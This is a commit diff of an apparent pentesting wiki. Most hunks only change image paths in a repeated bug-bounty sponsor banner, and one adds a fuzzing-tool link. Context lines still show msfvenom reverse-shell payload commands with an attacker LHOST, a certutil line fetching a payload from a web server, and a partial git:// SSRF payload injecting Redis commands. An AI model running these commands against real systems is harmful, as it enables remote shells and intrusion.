GITBOOK-4018: change request with no subject merged in GitBook
BIN
.gitbook/assets/image (1) (3) (1) (1).png
Normal file
After Width: | Height: | Size: 755 KiB |
Before Width: | Height: | Size: 755 KiB After Width: | Height: | Size: 129 KiB |
Before Width: | Height: | Size: 129 KiB After Width: | Height: | Size: 406 KiB |
Before Width: | Height: | Size: 406 KiB After Width: | Height: | Size: 84 KiB |
Before Width: | Height: | Size: 84 KiB After Width: | Height: | Size: 13 KiB |
|
@ -59,7 +59,7 @@ Get Access Today:
|
||||||
|
|
||||||
### [HACKENPROOF](https://bit.ly/3xrrDrL)
|
### [HACKENPROOF](https://bit.ly/3xrrDrL)
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src=".gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**HackenProof is home to all crypto bug bounties.**
|
**HackenProof is home to all crypto bug bounties.**
|
||||||
|
|
||||||
|
|
|
@ -12,7 +12,7 @@
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**HackenProof is home to all crypto bug bounties.**
|
**HackenProof is home to all crypto bug bounties.**
|
||||||
|
|
||||||
|
@ -307,7 +307,7 @@ So broken and disappeared that I am not going to talk about it. Just know that _
|
||||||
|
|
||||||
![](<../../.gitbook/assets/image (125).png>)
|
![](<../../.gitbook/assets/image (125).png>)
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**HackenProof is home to all crypto bug bounties.**
|
**HackenProof is home to all crypto bug bounties.**
|
||||||
|
|
||||||
|
@ -822,7 +822,7 @@ This works like an Evil-Twin but for Wi-Fi direct, you can impersonate a group o
|
||||||
|
|
||||||
TODO: Take a look to [https://github.com/wifiphisher/wifiphisher](https://github.com/wifiphisher/wifiphisher) (login con facebook e imitacionde WPA en captive portals)
|
TODO: Take a look to [https://github.com/wifiphisher/wifiphisher](https://github.com/wifiphisher/wifiphisher) (login con facebook e imitacionde WPA en captive portals)
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**HackenProof is home to all crypto bug bounties.**
|
**HackenProof is home to all crypto bug bounties.**
|
||||||
|
|
||||||
|
|
|
@ -12,7 +12,7 @@
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**HackenProof is home to all crypto bug bounties.**
|
**HackenProof is home to all crypto bug bounties.**
|
||||||
|
|
||||||
|
@ -29,7 +29,7 @@ Gain reputation points with each verified bug and conquer the top of the weekly
|
||||||
|
|
||||||
{% embed url="https://hackenproof.com/register" %}
|
{% embed url="https://hackenproof.com/register" %}
|
||||||
|
|
||||||
---
|
***
|
||||||
|
|
||||||
`msfvenom -p <PAYLOAD> -e <ENCODER> -f <FORMAT> -i <ENCODE COUNT> LHOST=<IP>`
|
`msfvenom -p <PAYLOAD> -e <ENCODER> -f <FORMAT> -i <ENCODE COUNT> LHOST=<IP>`
|
||||||
|
|
||||||
|
@ -194,7 +194,7 @@ msfvenom -p cmd/unix/reverse_python LHOST=(IP Address) LPORT=(Your Port) -f raw
|
||||||
msfvenom -p cmd/unix/reverse_bash LHOST=<Local IP Address> LPORT=<Local Port> -f raw > shell.sh
|
msfvenom -p cmd/unix/reverse_bash LHOST=<Local IP Address> LPORT=<Local Port> -f raw > shell.sh
|
||||||
```
|
```
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**HackenProof is home to all crypto bug bounties.**
|
**HackenProof is home to all crypto bug bounties.**
|
||||||
|
|
||||||
|
|
|
@ -12,7 +12,7 @@
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**HackenProof is home to all crypto bug bounties.**
|
**HackenProof is home to all crypto bug bounties.**
|
||||||
|
|
||||||
|
@ -329,9 +329,7 @@ certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil
|
||||||
|
|
||||||
**Detected by defender**
|
**Detected by defender**
|
||||||
|
|
||||||
|
<figure><img src="../../.gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
|
||||||
|
|
||||||
**HackenProof is home to all crypto bug bounties.**
|
**HackenProof is home to all crypto bug bounties.**
|
||||||
|
|
||||||
|
@ -592,7 +590,7 @@ WinPWN](https://github.com/SecureThisShit/WinPwn) PS console with some offensive
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**HackenProof is home to all crypto bug bounties.**
|
**HackenProof is home to all crypto bug bounties.**
|
||||||
|
|
||||||
|
|
|
@ -14,7 +14,7 @@
|
||||||
|
|
||||||
<figure><img src="../.gitbook/assets/image (7) (2).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../.gitbook/assets/image (7) (2).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../.gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**HackenProof is home to all crypto bug bounties.**
|
**HackenProof is home to all crypto bug bounties.**
|
||||||
|
|
||||||
|
@ -169,7 +169,7 @@ Gain reputation points with each verified bug and conquer the top of the weekly
|
||||||
* [ ] Can you [**abuse NFS to escalate privileges**](privilege-escalation/#nfs-privilege-escalation)?
|
* [ ] Can you [**abuse NFS to escalate privileges**](privilege-escalation/#nfs-privilege-escalation)?
|
||||||
* [ ] Do you need to [**escape from a restrictive shell**](privilege-escalation/#escaping-from-restricted-shells)?
|
* [ ] Do you need to [**escape from a restrictive shell**](privilege-escalation/#escaping-from-restricted-shells)?
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../.gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**HackenProof is home to all crypto bug bounties.**
|
**HackenProof is home to all crypto bug bounties.**
|
||||||
|
|
||||||
|
|
|
@ -12,7 +12,7 @@
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**HackenProof is home to all crypto bug bounties.**
|
**HackenProof is home to all crypto bug bounties.**
|
||||||
|
|
||||||
|
@ -31,7 +31,7 @@ Gain reputation points with each verified bug and conquer the top of the weekly
|
||||||
|
|
||||||
## Basic MacOS
|
## Basic MacOS
|
||||||
|
|
||||||
If you are not familiar with macOS, you should start learning the basics of macOS: 
|
If you are not familiar with macOS, you should start learning the basics of macOS:
|
||||||
|
|
||||||
* Special macOS **files & permissions:**
|
* Special macOS **files & permissions:**
|
||||||
|
|
||||||
|
@ -174,7 +174,7 @@ First of all, please note that **most of the tricks about privilege escalation a
|
||||||
* [**https://assets.sentinelone.com/c/sentinal-one-mac-os-?x=FvGtLJ**](https://assets.sentinelone.com/c/sentinal-one-mac-os-?x=FvGtLJ)
|
* [**https://assets.sentinelone.com/c/sentinal-one-mac-os-?x=FvGtLJ**](https://assets.sentinelone.com/c/sentinal-one-mac-os-?x=FvGtLJ)
|
||||||
* [**https://www.youtube.com/watch?v=vMGiplQtjTY**](https://www.youtube.com/watch?v=vMGiplQtjTY)
|
* [**https://www.youtube.com/watch?v=vMGiplQtjTY**](https://www.youtube.com/watch?v=vMGiplQtjTY)
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**HackenProof is home to all crypto bug bounties.**
|
**HackenProof is home to all crypto bug bounties.**
|
||||||
|
|
||||||
|
|
|
@ -16,7 +16,7 @@
|
||||||
|
|
||||||
Unlike Kernel Extensions, **System Extensions run in user space** instead of kernel space, reducing the risk of a system crash due to extension malfunction.
|
Unlike Kernel Extensions, **System Extensions run in user space** instead of kernel space, reducing the risk of a system crash due to extension malfunction.
|
||||||
|
|
||||||
<figure><img src="../../../.gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../../.gitbook/assets/image (1) (3) (1).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
There are three types of system extensions: **DriverKit** Extensions, **Network** Extensions, and **Endpoint Security** Extensions.
|
There are three types of system extensions: **DriverKit** Extensions, **Network** Extensions, and **Endpoint Security** Extensions.
|
||||||
|
|
||||||
|
|
|
@ -189,7 +189,7 @@ Then in order to trigger the execution it would be needed to know some place whe
|
||||||
|
|
||||||
In x64 versions this is straightforward using the mimikatz-esque **signature hunting** technique to search through **`libcorclr.dll`** for a reference to the symbol **`_hlpDynamicFuncTable`**, which we can dereference:
|
In x64 versions this is straightforward using the mimikatz-esque **signature hunting** technique to search through **`libcorclr.dll`** for a reference to the symbol **`_hlpDynamicFuncTable`**, which we can dereference:
|
||||||
|
|
||||||
<figure><img src="../../../.gitbook/assets/image.png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
All that is left to do is to find an address from which to start our signature search. To do this, we leverage another exposed debugger function, **`MT_GetDCB`**. This returns a number of useful bits of information on the target process, but for our case, we are interested in a field returned containing the **address of a helper function**, **`m_helperRemoteStartAddr`**. Using this address, we know just **where `libcorclr.dll` is located** within the target process memory and we can start our search for the DFT.
|
All that is left to do is to find an address from which to start our signature search. To do this, we leverage another exposed debugger function, **`MT_GetDCB`**. This returns a number of useful bits of information on the target process, but for our case, we are interested in a field returned containing the **address of a helper function**, **`m_helperRemoteStartAddr`**. Using this address, we know just **where `libcorclr.dll` is located** within the target process memory and we can start our search for the DFT.
|
||||||
|
|
||||||
|
|
|
@ -12,7 +12,7 @@
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**HackenProof is home to all crypto bug bounties.**
|
**HackenProof is home to all crypto bug bounties.**
|
||||||
|
|
||||||
|
@ -65,7 +65,7 @@ package:/data/app/com.android.insecurebankv2-Jnf8pNgwy3QA_U5f-n_4jQ==/base.apk
|
||||||
adb pull /data/app/com.android.insecurebankv2- Jnf8pNgwy3QA_U5f-n_4jQ==/base.apk
|
adb pull /data/app/com.android.insecurebankv2- Jnf8pNgwy3QA_U5f-n_4jQ==/base.apk
|
||||||
```
|
```
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**HackenProof is home to all crypto bug bounties.**
|
**HackenProof is home to all crypto bug bounties.**
|
||||||
|
|
||||||
|
@ -265,7 +265,7 @@ An application may contain secrets (API keys, passwords, hidden urls, subdomains
|
||||||
[content-protocol.md](content-protocol.md)
|
[content-protocol.md](content-protocol.md)
|
||||||
{% endcontent-ref %}
|
{% endcontent-ref %}
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**HackenProof is home to all crypto bug bounties.**
|
**HackenProof is home to all crypto bug bounties.**
|
||||||
|
|
||||||
|
@ -522,7 +522,7 @@ Probably you know about this kind of vulnerabilities from the Web. You have to b
|
||||||
* **Eternal cookies**: In several cases when the android application finish the session the cookie isn't revoked or it could be even saved to disk
|
* **Eternal cookies**: In several cases when the android application finish the session the cookie isn't revoked or it could be even saved to disk
|
||||||
* [**Secure Flag** in cookies](../../pentesting-web/hacking-with-cookies/#cookies-flags)
|
* [**Secure Flag** in cookies](../../pentesting-web/hacking-with-cookies/#cookies-flags)
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**HackenProof is home to all crypto bug bounties.**
|
**HackenProof is home to all crypto bug bounties.**
|
||||||
|
|
||||||
|
@ -738,7 +738,7 @@ It is able to:
|
||||||
|
|
||||||
Useful to detect malware: [https://koodous.com/](https://koodous.com)
|
Useful to detect malware: [https://koodous.com/](https://koodous.com)
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**HackenProof is home to all crypto bug bounties.**
|
**HackenProof is home to all crypto bug bounties.**
|
||||||
|
|
||||||
|
@ -826,7 +826,7 @@ For more information visit:
|
||||||
* [https://www.vegabird.com/yaazhini/](https://www.vegabird.com/yaazhini/)
|
* [https://www.vegabird.com/yaazhini/](https://www.vegabird.com/yaazhini/)
|
||||||
* [https://github.com/abhi-r3v0/Adhrit](https://github.com/abhi-r3v0/Adhrit)
|
* [https://github.com/abhi-r3v0/Adhrit](https://github.com/abhi-r3v0/Adhrit)
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**HackenProof is home to all crypto bug bounties.**
|
**HackenProof is home to all crypto bug bounties.**
|
||||||
|
|
||||||
|
|
|
@ -12,7 +12,7 @@
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**HackenProof is home to all crypto bug bounties.**
|
**HackenProof is home to all crypto bug bounties.**
|
||||||
|
|
||||||
|
@ -136,7 +136,7 @@ If developers, write in Java and the code is compiled to DEX bytecode, to revers
|
||||||
|
|
||||||
**Smali is the human readable version of Dalvik bytecode**. Technically, Smali and baksmali are the name of the tools (assembler and disassembler, respectively), but in Android, we often use the term “Smali” to refer to instructions. If you’ve done reverse engineering or computer architecture on compiled C/C++ code. **SMALI is like the assembly language: between the higher level source code and the bytecode**.
|
**Smali is the human readable version of Dalvik bytecode**. Technically, Smali and baksmali are the name of the tools (assembler and disassembler, respectively), but in Android, we often use the term “Smali” to refer to instructions. If you’ve done reverse engineering or computer architecture on compiled C/C++ code. **SMALI is like the assembly language: between the higher level source code and the bytecode**.
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**HackenProof is home to all crypto bug bounties.**
|
**HackenProof is home to all crypto bug bounties.**
|
||||||
|
|
||||||
|
@ -470,7 +470,7 @@ MDM or Mobile Device Management are software suits that are used to **ensure a c
|
||||||
|
|
||||||
Generally the MDM solutions perform functions like enforcing password policies, forcing the encryption of storage and enable remote wiping of device data.
|
Generally the MDM solutions perform functions like enforcing password policies, forcing the encryption of storage and enable remote wiping of device data.
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**HackenProof is home to all crypto bug bounties.**
|
**HackenProof is home to all crypto bug bounties.**
|
||||||
|
|
||||||
|
|
|
@ -12,7 +12,7 @@
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../.gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**HackenProof is home to all crypto bug bounties.**
|
**HackenProof is home to all crypto bug bounties.**
|
||||||
|
|
||||||
|
@ -112,7 +112,7 @@ The **rpcdump.exe** from [rpctools](https://resources.oreilly.com/examples/97805
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../.gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**HackenProof is home to all crypto bug bounties.**
|
**HackenProof is home to all crypto bug bounties.**
|
||||||
|
|
||||||
|
|
|
@ -12,7 +12,7 @@
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../.gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**HackenProof is home to all crypto bug bounties.**
|
**HackenProof is home to all crypto bug bounties.**
|
||||||
|
|
||||||
|
@ -129,7 +129,7 @@ The tool [https://github.com/andresriancho/mongo-objectid-predict](https://githu
|
||||||
|
|
||||||
If you are root you can **modify** the **mongodb.conf** file so no credentials are needed (_noauth = true_) and **login without credentials**.
|
If you are root you can **modify** the **mongodb.conf** file so no credentials are needed (_noauth = true_) and **login without credentials**.
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../.gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**HackenProof is home to all crypto bug bounties.**
|
**HackenProof is home to all crypto bug bounties.**
|
||||||
|
|
||||||
|
|
|
@ -12,7 +12,7 @@
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../.gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**HackenProof is home to all crypto bug bounties.**
|
**HackenProof is home to all crypto bug bounties.**
|
||||||
|
|
||||||
|
@ -167,7 +167,7 @@ winrm quickconfig
|
||||||
winrm set winrm/config/client '@{TrustedHosts="Computer1,Computer2"}'
|
winrm set winrm/config/client '@{TrustedHosts="Computer1,Computer2"}'
|
||||||
```
|
```
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../.gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**HackenProof is home to all crypto bug bounties.**
|
**HackenProof is home to all crypto bug bounties.**
|
||||||
|
|
||||||
|
@ -338,7 +338,7 @@ Entry_2:
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../.gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**HackenProof is home to all crypto bug bounties.**
|
**HackenProof is home to all crypto bug bounties.**
|
||||||
|
|
||||||
|
|
|
@ -12,7 +12,7 @@
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../.gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**HackenProof is home to all crypto bug bounties.**
|
**HackenProof is home to all crypto bug bounties.**
|
||||||
|
|
||||||
|
@ -172,8 +172,7 @@ Now as can be seen below we have complete system access:
|
||||||
|
|
||||||
* `port:6000 x11`
|
* `port:6000 x11`
|
||||||
|
|
||||||
|
<figure><img src="../.gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
|
||||||
|
|
||||||
**HackenProof is home to all crypto bug bounties.**
|
**HackenProof is home to all crypto bug bounties.**
|
||||||
|
|
||||||
|
|
|
@ -12,7 +12,7 @@
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../.gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**HackenProof is home to all crypto bug bounties.**
|
**HackenProof is home to all crypto bug bounties.**
|
||||||
|
|
||||||
|
@ -154,7 +154,7 @@ HGET <KEY> <FIELD>
|
||||||
|
|
||||||
**Dump the database with npm**[ **redis-dump**](https://www.npmjs.com/package/redis-dump) **or python** [**redis-utils**](https://pypi.org/project/redis-utils/)
|
**Dump the database with npm**[ **redis-dump**](https://www.npmjs.com/package/redis-dump) **or python** [**redis-utils**](https://pypi.org/project/redis-utils/)
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../.gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**HackenProof is home to all crypto bug bounties.**
|
**HackenProof is home to all crypto bug bounties.**
|
||||||
|
|
||||||
|
@ -340,7 +340,7 @@ git://[0:0:0:0:0:ffff:127.0.0.1]:6379/%0D%0A%20multi%0D%0A%20sadd%20resque%3Agit
|
||||||
|
|
||||||
_For some reason (as for the author of_ [_https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/_](https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/) _where this info was took from) the exploitation worked with the `git` scheme and not with the `http` scheme._
|
_For some reason (as for the author of_ [_https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/_](https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/) _where this info was took from) the exploitation worked with the `git` scheme and not with the `http` scheme._
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../.gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**HackenProof is home to all crypto bug bounties.**
|
**HackenProof is home to all crypto bug bounties.**
|
||||||
|
|
||||||
|
|
|
@ -12,7 +12,7 @@
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../.gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**HackenProof is home to all crypto bug bounties.**
|
**HackenProof is home to all crypto bug bounties.**
|
||||||
|
|
||||||
|
@ -186,7 +186,7 @@ curl http://127.0.0.1:80
|
||||||
|
|
||||||
* [https://academy.hackthebox.com/module/145/section/1295](https://academy.hackthebox.com/module/145/section/1295)
|
* [https://academy.hackthebox.com/module/145/section/1295](https://academy.hackthebox.com/module/145/section/1295)
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../.gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**HackenProof is home to all crypto bug bounties.**
|
**HackenProof is home to all crypto bug bounties.**
|
||||||
|
|
||||||
|
|
|
@ -12,7 +12,7 @@
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**HackenProof is home to all crypto bug bounties.**
|
**HackenProof is home to all crypto bug bounties.**
|
||||||
|
|
||||||
|
@ -388,7 +388,7 @@ It's possible to **load a .NET dll within MSSQL with custom functions**. This, h
|
||||||
|
|
||||||
There are other methods to get command execution, such as adding [extended stored procedures](https://docs.microsoft.com/en-us/sql/relational-databases/extended-stored-procedures-programming/adding-an-extended-stored-procedure-to-sql-server), [CLR Assemblies](https://docs.microsoft.com/en-us/dotnet/framework/data/adonet/sql/introduction-to-sql-server-clr-integration), [SQL Server Agent Jobs](https://docs.microsoft.com/en-us/sql/ssms/agent/schedule-a-job?view=sql-server-ver15), and [external scripts](https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/sp-execute-external-script-transact-sql).
|
There are other methods to get command execution, such as adding [extended stored procedures](https://docs.microsoft.com/en-us/sql/relational-databases/extended-stored-procedures-programming/adding-an-extended-stored-procedure-to-sql-server), [CLR Assemblies](https://docs.microsoft.com/en-us/dotnet/framework/data/adonet/sql/introduction-to-sql-server-clr-integration), [SQL Server Agent Jobs](https://docs.microsoft.com/en-us/sql/ssms/agent/schedule-a-job?view=sql-server-ver15), and [external scripts](https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/sp-execute-external-script-transact-sql).
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**HackenProof is home to all crypto bug bounties.**
|
**HackenProof is home to all crypto bug bounties.**
|
||||||
|
|
||||||
|
@ -541,7 +541,7 @@ You probably will be able to **escalate to Administrator** following one of thes
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**HackenProof is home to all crypto bug bounties.**
|
**HackenProof is home to all crypto bug bounties.**
|
||||||
|
|
||||||
|
|
|
@ -12,7 +12,7 @@
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../.gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**HackenProof is home to all crypto bug bounties.**
|
**HackenProof is home to all crypto bug bounties.**
|
||||||
|
|
||||||
|
@ -99,7 +99,7 @@ Entry_2:
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../.gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**HackenProof is home to all crypto bug bounties.**
|
**HackenProof is home to all crypto bug bounties.**
|
||||||
|
|
||||||
|
|
|
@ -248,6 +248,7 @@ Launch some kind of **spider** inside the web. The goal of the spider is to **fi
|
||||||
* [**HTTPLoot**](https://github.com/redhuntlabs/HTTPLoot) (go): Crawl (even by filling forms) and also find sensitive info using specific regexes.
|
* [**HTTPLoot**](https://github.com/redhuntlabs/HTTPLoot) (go): Crawl (even by filling forms) and also find sensitive info using specific regexes.
|
||||||
* [**SpiderSuite**](https://github.com/3nock/SpiderSuite): Spider Suite is an advance multi-feature GUI web security Crawler/Spider designed for cyber security professionals.
|
* [**SpiderSuite**](https://github.com/3nock/SpiderSuite): Spider Suite is an advance multi-feature GUI web security Crawler/Spider designed for cyber security professionals.
|
||||||
* [**jsluice**](https://github.com/BishopFox/jsluice) (go): It's a Go package and [command-line tool](https://github.com/BishopFox/jsluice/blob/main/cmd/jsluice) for extracting URLs, paths, secrets, and other interesting data from JavaScript source code.
|
* [**jsluice**](https://github.com/BishopFox/jsluice) (go): It's a Go package and [command-line tool](https://github.com/BishopFox/jsluice/blob/main/cmd/jsluice) for extracting URLs, paths, secrets, and other interesting data from JavaScript source code.
|
||||||
|
* [**ParaForge**](https://github.com/Anof-cyber/ParaForge): ParaForge is a simple **Burp Suite extension** to **extract the paramters and endpoints** from the request to create custom wordlist for fuzzing and enumeration.
|
||||||
|
|
||||||
### Brute Force directories and files
|
### Brute Force directories and files
|
||||||
|
|
||||||
|
|
|
@ -1,122 +1,121 @@
|
||||||
|
